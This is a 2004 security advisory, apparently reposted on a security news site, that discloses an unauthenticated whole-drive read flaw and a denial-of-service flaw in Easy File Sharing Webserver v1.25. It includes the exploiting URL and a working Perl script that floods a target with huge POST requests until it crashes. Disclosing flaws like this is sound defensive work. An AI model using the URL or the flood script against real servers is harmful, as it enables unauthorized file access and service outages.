Risks
Vulnerabilities
Browse by
Easy File Sharing Webserver v1.25 Multiple Vulnerabilities
25 August 2004
Bookmark and Share
From: "GulfTech Security" <security(At)gulftech.org>

GulfTech Security Research August, 24th 2004

Vendor : EFS Software Inc.
URL : http://www.sharing-file.com
Version : Easy File Sharing Webserver v1.25
Risk : Unauthorized System Access && DoS

Description:
Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser (IE,Netscape,Opera etc.). It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs. They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum.

Unauthorized System Access:
The authorization function used by EFS Webserver is supposed to keep just anyone from being able to access your files. But this is not the case and an attacker has read access to the entire hard drive by default.

http://127.0.0.1/disk_c

This url will give an attacker read access to the entire C drive. The issue is exploited by requesting the name of a virtual folder on the server. (disk_c is there by default)

Denial of Service:
Easy File Sharing Web Server can be DoS'ed and even remotely crashed by sending a number of large HTTP requests to the web server. The CPU usage goes up to 99% and in some cases crash. Attached is a Proof Of Concept script for this issue.

Solution:
The developers were contacted but never responded to my emails

Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00045-08242004

Credits:
James Bercegay of the GulfTech Security Research Team

["efswsdos.pl" (application/octet-stream)]

#!/usr/bin/perl
#####################################################
# Easy File Sharing Webserver v1.25 Denial Of Service
# Proof Of Concept Code By GulfTech Security Research
#####################################################
# Easy File Sharing Webserver v1.25 will consume 99%
# of CPU usage until it crashes when sent large req's
#####################################################

use IO::Socket;

print "=====================================================\n".
" Easy File Sharing Webserver v1.25 Denial Of Service \n".
"=====================================================\n";

unless (@ARGV > 1) { die("usage: efswsdos.pl host port"); }

my $remote_host = $ARGV[0];
my $remote_port = $ARGV[1];
my $done = "\015\012\015\012";
my $buff = "A" x 1000000;
my $post = "POST /".$buff." HTTP/1.0 ".$done;

print "[*] DoS'ing Server $remote_host Press ctrl+c to stop\n";

while ($post) {
for (my $i=1; $i<10; $i++) {
my $i = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $remote_host,
PeerPort => $remote_port,
Timeout => '10000',
Type => SOCK_STREAM,
) || die("[*] Server Is Dead!");

print $i $post;
$i->autoflush(1);
}
}
close $i;



Spotlight

Operation Pawn Storm: Varied targets and attack vectors, next-level spear-phishing tactics

Posted on 23 October 2014.  |  Targets of the spear phishing emails included staff at the Ministry of Defense in France, in the Vatican Embassy in Iraq, military officials from a number of countries, and more.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  

DON'T
MISS

Fri, Oct 24th
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //